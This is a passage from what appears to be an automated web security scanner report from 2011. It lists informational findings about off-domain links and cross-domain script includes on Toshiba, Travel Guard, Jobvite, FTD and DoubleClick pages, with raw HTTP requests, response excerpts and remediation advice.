<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li><a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=">Sign Up for Emails</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/">us.toshiba.com</a>
...[SNIP]...
<li><a href="http://www.toshiba.com/tai/">Toshiba USA</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/innovation-lab/green">Recycle &amp; Trade-in</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact">Contact

Support</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download">Downloads &amp;

Drivers</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty">
Warranty &amp; Service</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp">Tech Support Home</a>
...[SNIP]...
<div class="logos">
<a target="_blank" href="http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153"><img alt=""

src="/images/ui5/bbbLogo.gif"></a>
<a href="https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com" target="_blank"><img width="65"
height="37" border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif">
</a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<!-- Start of DoubleClick Spotlight Tag --><IMG STYLE="position:absolute; " SRC="http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=42154056;ord=1?" WIDTH="1" HEIGHT="1" BORDER="0"><!-- End of DoubleClick Spotlight Tag -->
...[SNIP]...
<!-- Google Reporting Start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.60. http://www.toshibadirect.com/td/b2c/laptops.to

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1110806401.1305542050@@@@;Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0 style="display:none"></IFRAME>
...[SNIP]...
<br />
To fully experience ToshibaDirect.com we recommend upgrading to the latest version of Internet Explorer. <a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" target="_blank">Upgrade Now &raquo;</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family"> <a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=" name="&lid=TopNav_SpecialOffers_SignUpForEmails"><h4>
...[SNIP]...
<li class="menu-item last">
<a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support">Support</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family first"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support_TechSupportCenter"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg" name="&lid=TopNav_Support_RegisterYourLaptop"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family last"><a href="https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi" name="&lid=TopNav_Support_RegisterYourTV"><h4>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js"></script>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/dei10b_TDLaptops_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li>Intel&reg; <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom&#153;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel&reg; <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom&#153;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel&reg; <a target="_blank" href="http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0" onclick="return intel(this)" class="intel-pentium-locked" title="Click here to learn more about Intel&reg; Pentium&reg; Processors">Pentium&reg;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li><a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=">Sign Up for Emails</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/">us.toshiba.com</a>
...[SNIP]...
<li><a href="http://www.toshiba.com/tai/">Toshiba USA</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/innovation-lab/green">Recycle &amp; Trade-in</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact">Contact

Support</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download">Downloads &amp;

Drivers</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty">
Warranty &amp; Service</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp">Tech Support Home</a>
...[SNIP]...
<div class="logos">
<a target="_blank" href="http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153"><img alt=""

src="/images/ui5/bbbLogo.gif"></a>
<a href="https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com" target="_blank"><img width="65"
height="37" border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif">
</a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<!-- Start of DoubleClick Spotlight Tag --><IMG STYLE="position:absolute; " SRC="http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=65821692;ord=1?" WIDTH="1" HEIGHT="1" BORDER="0"><!-- End of DoubleClick Spotlight Tag -->
...[SNIP]...
<!-- Google Reporting Start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18. Cross-domain script include
There are 56 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:33:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><title>
   State Se
...[SNIP]...
<div class="verisignFooter"><script src="https://seal.verisign.com/getseal?host_name=buy.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

18.2. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:50 GMT
Expires: Mon, 16 May 2011 01:53:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2464

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://lea
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

18.3. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=6946086450479.925? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:54:40 GMT
Expires: Mon, 16 May 2011 01:54:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2190

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://ta
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.4. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=63965571? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:56 GMT
Expires: Mon, 16 May 2011 01:53:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1023

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA">
</script>
...[SNIP]...

18.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

http://www.linkedin.com/companyInsider?script&useBorder=no
http://pics.bluenile.com/1166193570/bundles/core.js
http://pics.bluenile.com/442036000/js/ga.js
http://pics.bluenile.com/N877218625/bundles/allpages.js
http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=am2qlgznv2utc045d0xr1hr3; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Content-Length: 40128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen, print" href="http://pics.bluenile.com/1675544779/bundles/allpages.css" />

<script type="text/javascript" src="http://pics.bluenile.com/1166193570/bundles/core.js" ></script>

<script type="text/javascript" src="http://pics.bluenile.com/442036000/js/ga.js" ></script>
...[SNIP]...
</div>


                   <script type="text/javascript" src="http://pics.bluenile.com/N877218625/bundles/allpages.js" ></script>

   
   <script type="text/javascript" src="http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js" ></script>
...[SNIP]...

18.6. https://ordering.ftd.com/new-signup/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

https://www.ftdimg.com/v20110407/js/compressed.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
